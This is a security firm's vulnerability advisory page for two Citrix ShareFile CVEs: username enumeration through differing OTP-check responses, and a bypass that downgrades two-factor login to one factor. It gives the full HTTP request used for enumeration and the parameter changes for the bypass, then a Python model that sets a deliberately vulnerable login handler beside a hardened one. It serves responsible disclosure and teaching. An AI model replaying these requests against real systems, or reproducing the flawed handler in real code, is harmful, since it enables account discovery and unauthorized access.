Research and Development
Our CVEs
CVE 2019-7217 : Citrix ShareFile User Enumeration
Summary
It is possible to enumerate application usernames based on the different server responses returned by the request that checks the OTP code.
No authentication is required.
Tested Versions
Citrix ShareFile through 19.1
Product URLs
https://www.sharefile.com/
Details
It is possible to enumerate application usernames based on the different server responses returned by the request that checks the OTP code.
No authentication is required.
Example: It is possible to enumerate application usernames based on the different server responses to the OTP verification request, without user authentication.

Request:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if the username is not correct:

{"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126}

Response if the username is correct:

{"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}
Timeline
22-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release
CREDIT
Discovered by Armando Huesca and Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)
CVE 2019-7218 : Citrix ShareFile TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR
Summary
An attacker with access to the victim's offline OTP physical token or virtual app (such as Google Authenticator) is able to bypass the first authentication phase (the username/password mechanism) and log in using a username/OTP combination only (phase 2 of 2FA).
Tested Versions
Citrix ShareFile through 19.1
Product URLs
https://www.sharefile.com/
Details
An attacker with access to the victim's offline OTP physical token or virtual app (such as Google Authenticator) is able to bypass the first authentication phase (the username/password mechanism) and log in using a username/OTP combination only (phase 2 of 2FA).
In this way it is possible to downgrade 2FA to 1FA without knowing the victim's password.
To exploit this vulnerability, the attacker must have access to the offline OTP token (physical or virtual): access cannot be gained if the OTP is generated after phase 1 authentication and sent to the client via SMS or phone call.
This vulnerability exists because the server does not verify that the client's phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).
Example: An attacker is able to intercept the log-in request with garbage data and use this request as the base for the attack, changing the op and password parameters as follows:

Figure 1 - phase 1 default log-in request and response

- change op=webflow-auth to op=webflow-verify
- change password=* to code=[OTP]

If the username/OTP combination is correct (phase 2 succeeded), phase 1 authentication is bypassed and the attacker gains unauthorized access to the application, as shown below:

Figure 2 - evil phase 2 request with modified parameters

The following is proof of unauthorized access to the web application by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application
ADVICE: Make sure that the client's phase 1 authentication succeeded before validating phase 2 authentication.
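As an added illustration (not Citrix code and not part of the original advisories), the following Python model shows a two-step login handler in the flawed form both CVEs describe beside a hardened form: the vulnerable handler answers webflow-verify with different error codes for unknown and known users (CVE-2019-7217) and accepts an OTP without a completed phase 1 (CVE-2019-7218), while the hardened handler returns one uniform failure response and only checks the OTP for a session that already passed phase 1 for the same username. The user store, the Session object and the GENERIC_FAIL response are constructed assumptions; the error codes 126 and 122 are those quoted above.

```python
import hmac
from dataclasses import dataclass

# Constructed sample user store for the demo; not real accounts or secrets.
USERS = {"alice@example.com": {"password": "s3cret-pw", "otp": "123456"}}

@dataclass
class Session:
    phase1_ok: bool = False   # set only after a correct username/password
    username: str = ""
    logged_in: bool = False

def webflow_vulnerable(session, op, username, password="", code=""):
    """Flawed flow: error codes differ for unknown vs. known users (enumeration),
    and webflow-verify never checks that phase 1 succeeded (2FA downgrade)."""
    user = USERS.get(username)
    if op == "webflow-auth":
        if user and hmac.compare_digest(user["password"], password):
            session.phase1_ok, session.username = True, username
            return {"error": False}
        return {"error": True, "errorCode": 126}
    if op == "webflow-verify":
        if user is None:
            return {"error": True, "errorCode": 126}  # "not authorized to use this client"
        if hmac.compare_digest(user["otp"], code):
            session.logged_in = True                  # OTP alone grants access
            return {"error": False}
        return {"error": True, "errorCode": 122}      # "Unable to verify two factor code."
    return {"error": True, "errorCode": 126}

# Hypothetical uniform failure response used by the hardened handler.
GENERIC_FAIL = {"error": True, "errorMessage": "Authentication failed", "errorCode": 1}

def webflow_hardened(session, op, username, password="", code=""):
    """Fixed flow: every failure returns the same response, and the OTP is only
    checked for a session whose phase 1 already succeeded for the same username."""
    user = USERS.get(username)
    if op == "webflow-auth":
        if user and hmac.compare_digest(user["password"], password):
            session.phase1_ok, session.username = True, username
            return {"error": False}
        return dict(GENERIC_FAIL)
    if op == "webflow-verify":
        bound = session.phase1_ok and session.username == username and user is not None
        if bound and hmac.compare_digest(user["otp"], code):
            session.logged_in = True
            return {"error": False}
        session.phase1_ok = False   # failed or unbound verify: phase 1 must be redone
        return dict(GENERIC_FAIL)
    return dict(GENERIC_FAIL)
```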
Timeline
28-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release
CREDIT
Discovered by Andrea Pessione and Armando Huesca of SKIT (Shorr Kan IT Engineering srl)
New CVEs in the next episode ...
